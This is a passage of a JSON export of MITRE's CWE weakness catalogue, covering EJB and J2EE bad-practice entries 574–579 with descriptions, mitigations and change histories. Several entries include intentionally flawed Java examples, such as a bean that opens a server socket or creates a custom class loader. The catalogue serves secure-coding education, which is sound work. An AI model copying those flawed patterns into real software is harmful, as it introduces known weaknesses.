JVMs.\\"","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"821","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not use Synchronization Primitives when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example a Customer Entity EJB provides access to customer information in a database for a business application.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Entitypublic class Customer implements Serializable {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String id;private String firstName;private String lastName;private Address address;public Customer() {...}public Customer(String id, String firstName, String lastName) {...}@Idpublic String getCustomerId() {...}public synchronized void setCustomerId(String id) {...}public String getFirstName() {...}public synchronized void setFirstName(String firstName) {...}public String getLastName() {...}public synchronized void setLastName(String lastName) {...}@OneToOne()public Address getAddress() {...}public synchronized void setAddress(Address address) {...}","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","",""]}}}},"Body_Text":"However, the customer entity EJB uses the synchronized keyword for the set methods to attempt to provide thread safe synchronization for the member variables. The use of synchronized methods violate the restriction of the EJB specification against the use synchronization primitives within EJBs. Using synchronization primitives may cause inconsistent behavior of the EJB when used within different EJB containers."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"575":{"attr":{"@_ID":"575","@_Name":"EJB Bad Practices: Use of AWT Swing","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using AWT/Swing.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"An enterprise bean must not use the AWT functionality to attempt to output information to a display, or to input information from a keyboard.\\" The specification justifies this requirement in the following way: \\"Most servers do not allow direct interaction between an application program and a keyboard/display attached to the server system.\\"","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Do not use AWT/Swing when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java example is a simple converter class for converting US dollars to Yen. This converter class demonstrates the improper practice of using a stateless session Enterprise JavaBean that implements an AWT Component and AWT keyboard event listener to retrieve keyboard input from the user for the amount of the US dollars to convert to Yen.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class ConverterSessionBean extends Component implements KeyListener, ConverterSessionRemote {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...private StringBuffer enteredText = new StringBuffer();private BigDecimal yenRate = new BigDecimal(\\"115.3100\\");public ConverterSessionBean() {}public BigDecimal dollarToYen(BigDecimal dollars) {}public void keyTyped(KeyEvent event) {}public void keyPressed(KeyEvent e) {}public void keyReleased(KeyEvent e) {}public void paint(Graphics g) {...}...","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","",""],"xhtml:i":["/* member variables for receiving keyboard input using AWT API */","/* conversion rate on US dollars to Yen */","/* member functions for implementing AWT KeyListener interface */","/* member functions for receiving keyboard input and displaying output */"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"super();...addKeyListener(this);","xhtml:br":["","","",""],"xhtml:i":"/* method calls for setting up AWT Component for receiving keyboard input */"}},{"#text":"BigDecimal result = dollars.multiply(yenRate);return result.setScale(2, BigDecimal.ROUND_DOWN);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class ConverterSessionBean implements ConverterSessionRemoteInterface {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private BigDecimal yenRate = new BigDecimal(\\"115.3100\\");public ConverterSessionBean() {}public BigDecimal dollarToYen(BigDecimal dollars) {}","xhtml:br":["","","","","","","","",""],"xhtml:i":["/* conversion rate on US dollars to Yen */","/* remote method to convert US dollars to Yen */"],"xhtml:div":{"#text":"BigDecimal result = dollars.multiply(yenRate);return result.setScale(2, BigDecimal.ROUND_DOWN);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}},{"attr":{"@_Nature":"good","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;%@ page import=\\"converter.ejb.Converter, java.math.*, javax.naming.*\\"%&gt;&lt;%!%&gt;&lt;html&gt;&lt;/html&gt;","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Converter converter = null;public void jspInit() {}public void jspDestroy() {}","xhtml:br":["",""],"xhtml:div":[{"#text":"try {} catch (Exception ex) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"InitialContext ic = new InitialContext();converter = (Converter) ic.lookup(Converter.class.getName());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"Couldn\'t create converter bean.\\"+ ex.getMessage());","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"converter = null;","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;head&gt;&lt;title&gt;Converter&lt;/title&gt;&lt;/head&gt;&lt;body bgcolor=\\"white\\"&gt;&lt;/body&gt;","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;h1&gt;Converter&lt;/h1&gt;&lt;hr&gt;&lt;p&gt;Enter an amount to convert:&lt;/p&gt;&lt;form method=\\"get\\"&gt;&lt;/form&gt;&lt;%%&gt;&lt;p&gt;&lt;%= amount %&gt; dollars are &lt;%= yenAmount %&gt; Yen.&lt;p&gt;&lt;%%&gt;","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"&lt;input type=\\"text\\" name=\\"amount\\" size=\\"25\\"&gt;&lt;br&gt;&lt;p&gt;&lt;input type=\\"submit\\" value=\\"Submit\\"&gt;&lt;input type=\\"reset\\" value=\\"Reset\\"&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},{"#text":"String amount = request.getParameter(\\"amount\\");if ( amount != null &amp;&amp; amount.length() &gt; 0 ) {","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"BigDecimal d = new BigDecimal(amount);BigDecimal yenAmount = converter.dollarToYen(d);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"}","attr":{"@_style":"margin-left:10px;"}}]}}}}]}}],"Body_Text":["This use of the AWT and Swing APIs within any kind of Enterprise JavaBean not only violates the restriction of the EJB specification against using AWT or Swing within an EJB but also violates the intended use of Enterprise JavaBeans to separate business logic from presentation logic.","The Stateless Session Enterprise JavaBean should contain only business logic. Presentation logic should be provided by some other mechanism such as Servlets or Java Server Pages (JSP) as in the following Java/JSP example."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"576":{"attr":{"@_ID":"576","@_Name":"EJB Bad Practices: Use of Java I/O","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using the java.io package.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"An enterprise bean must not use the java.io package to attempt to access files and directories in the file system.\\" The specification justifies this requirement in the following way: \\"The file system APIs are not well-suited for business components to access data. Business components should use a resource manager API, such as JDBC, to store data.\\"","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Do not use Java I/O when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java example is a simple stateless Enterprise JavaBean that retrieves the interest rate for the number of points for a mortgage. In this example, the interest rates for various points are retrieved from an XML document on the local file system, and the EJB uses the Java I/O API to retrieve the XML document from the local file system.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class InterestRateBean implements InterestRateRemote {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Document interestRateXMLDocument = null;private File interestRateFile = null;public InterestRateBean() {}public BigDecimal getInterestRate(Integer points) {}private BigDecimal getInterestRateFromXML(Integer points) {...}","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"interestRateFile = new File(Constants.INTEREST_RATE_FILE);if (interestRateFile.exists()){}","xhtml:br":["","","","",""],"xhtml:i":"/* get XML document from the local filesystem */","xhtml:div":{"#text":"DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();DocumentBuilder db = dbf.newDocumentBuilder();interestRateXMLDocument = db.parse(interestRateFile);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},{"#text":"return getInterestRateFromXML(points);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"/* member function to retrieve interest rate from XML document on the local file system */"}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class InterestRateBean implements InterestRateRemote {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public InterestRateBean() {}public BigDecimal getInterestRate(Integer points) {}private BigDecimal getInterestRateFromXMLParser(Integer points) {...}","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return getInterestRateFromXMLParser(points);","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* member function to retrieve interest rate from XML document using an XML parser API */"}}}}],"Body_Text":["This use of the Java I/O API within any kind of Enterprise JavaBean violates the EJB specification by using the java.io package for accessing files within the local filesystem.","An Enterprise JavaBean should use a resource manager API for storing and accessing data. In the following example, the private member function getInterestRateFromXMLParser uses an XML parser API to retrieve the interest rates."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"577":{"attr":{"@_ID":"577","@_Name":"EJB Bad Practices: Use of Sockets","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using sockets.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"An enterprise bean must not attempt to listen on a socket, accept connections on a socket, or use a socket for multicast.\\" The specification justifies this requirement in the following way: \\"The EJB architecture allows an enterprise bean instance to be a network socket client, but it does not allow it to be a network server. Allowing the instance to become a network server would conflict with the basic function of the enterprise bean-- to serve the EJB clients.\\"","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Do not use Sockets when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following Java example is a simple stateless Enterprise JavaBean that retrieves stock symbols and stock values. The Enterprise JavaBean creates a socket and listens for and accepts connections from clients on the socket.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class StockSymbolBean implements StockSymbolRemote {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ServerSocket serverSocket = null;Socket clientSocket = null;public StockSymbolBean() {}public String getStockSymbol(String name) {...}public BigDecimal getStockValue(String symbol) {...}private void processClientInputFromSocket() {...}","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}try {} catch (IOException e) {...}","xhtml:div":[{"#text":"serverSocket = new ServerSocket(Constants.SOCKET_PORT);","attr":{"@_style":"margin-left:10px;"}},{"#text":"clientSocket = serverSocket.accept();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class StockSymbolBean extends Thread implements StockSymbolRemote {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ServerSocket serverSocket = null;Socket clientSocket = null;boolean listening = false;public StockSymbolBean() {}public String getStockSymbol(String name) {...}public BigDecimal getStockValue(String symbol) {...}public void run() {}","xhtml:br":["","","","","","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}listening = true;while(listening) {}","xhtml:div":[{"#text":"serverSocket = new ServerSocket(Constants.SOCKET_PORT);","attr":{"@_style":"margin-left:10px;"}},{"#text":"start();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","",""]}},{"#text":"try {} catch (IOException e) {...}...","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"clientSocket = serverSocket.accept();","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}]}}}}],"Body_Text":["And the following Java example is similar to the previous example but demonstrates the use of multicast socket connections within an Enterprise JavaBean.","The previous two examples within any type of Enterprise JavaBean violate the EJB specification by attempting to listen on a socket, accepting connections on a socket, or using a socket for multicast."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"578":{"attr":{"@_ID":"578","@_Name":"EJB Bad Practices: Use of Class Loader","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program violates the Enterprise JavaBeans (EJB) specification by using the class loader.","Extended_Description":"The Enterprise JavaBeans specification requires that every bean provider follow a set of programming guidelines designed to ensure that the bean will be portable and behave consistently in any EJB container. In this case, the program violates the following EJB guideline: \\"The enterprise bean must not attempt to create a class loader; obtain the current class loader; set the context class loader; set security manager; create a new security manager; stop the JVM; or change the input, output, and error streams.\\" The specification justifies this requirement in the following way: \\"These functions are reserved for the EJB container. Allowing the enterprise bean to use these functions could compromise security and decrease the container\'s ability to properly manage the runtime environment.\\"","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Do not use the Class Loader when writing EJBs."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following Java example is a simple stateless Enterprise JavaBean that retrieves the interest rate for the number of points for a mortgage. The interest rates for various points are retrieved from an XML document on the local file system, and the EJB uses the Class Loader for the EJB class to obtain the XML document from the local file system as an input stream.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class InterestRateBean implements InterestRateRemote {}}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private Document interestRateXMLDocument = null;public InterestRateBean() {DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();} catch (IOException ex) {...}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ClassLoader loader = this.getClass().getClassLoader();InputStream in = loader.getResourceAsStream(Constants.INTEREST_RATE_FILE);","xhtml:br":["","","","",""],"xhtml:i":["// get XML document from the local filesystem as an input stream","// using the ClassLoader for this class"]}}}},{"#text":"DocumentBuilder db = dbf.newDocumentBuilder();interestRateXMLDocument = db.parse(interestRateFile);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public BigDecimal getInterestRate(Integer points) {}private BigDecimal getInterestRateFromXML(Integer points) {...}","xhtml:div":{"#text":"return getInterestRateFromXML(points);","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["","","",""],"xhtml:i":"/* member function to retrieve interest rate from XML document on the local file system */"}}]}},"Body_Text":"This use of the Java Class Loader class within any kind of Enterprise JavaBean violates the restriction of the EJB specification against obtaining the current class loader as this could compromise the security of the application using the EJB."},{"Intro_Text":"An EJB is also restricted from creating a custom class loader and creating a class and instance of a class from the class loader, as shown in the following example.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Statelesspublic class LoaderSessionBean implements LoaderSessionRemote {}","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public LoaderSessionBean() {}public class CustomClassLoader extends ClassLoader {}","xhtml:div":{"#text":"try {} catch (Exception ex) {...}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ClassLoader loader = new CustomClassLoader();Class c = loader.loadClass(\\"someClass\\");Object obj = c.newInstance();/* perform some task that uses the new class instance member variables or functions */...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}},"xhtml:br":["","","",""]}}}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"579":{"attr":{"@_ID":"579","@_Name":"J2EE Bad Practices: Non-serializable Object Stored in Session","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores a non-serializable object as an HttpSession attribute, which can hurt reliability.","Extended_Description":"A J2EE application can make use of multiple JVMs in order to improve application reliability and performance. In order to make the multiple JVMs appear as a single application to the end user, the J2EE container can replicate an HttpSession object across multiple JVMs so that if one JVM becomes unavailable another can step in and take its place without disrupting the flow of the application. This is only possible if all session data is serializable, allowing the session to be duplicated between the JVMs.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"In order for session replication to work, the values the application stores as attributes in the session must implement the Serializable interface."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following class adds itself to the session, but because it is not serializable, the session can no longer be replicated.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class DataGlob {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String globName;String globValue;public void addToSession(HttpSession session) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"session.setAttribute(\\"glob\\", this);","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content 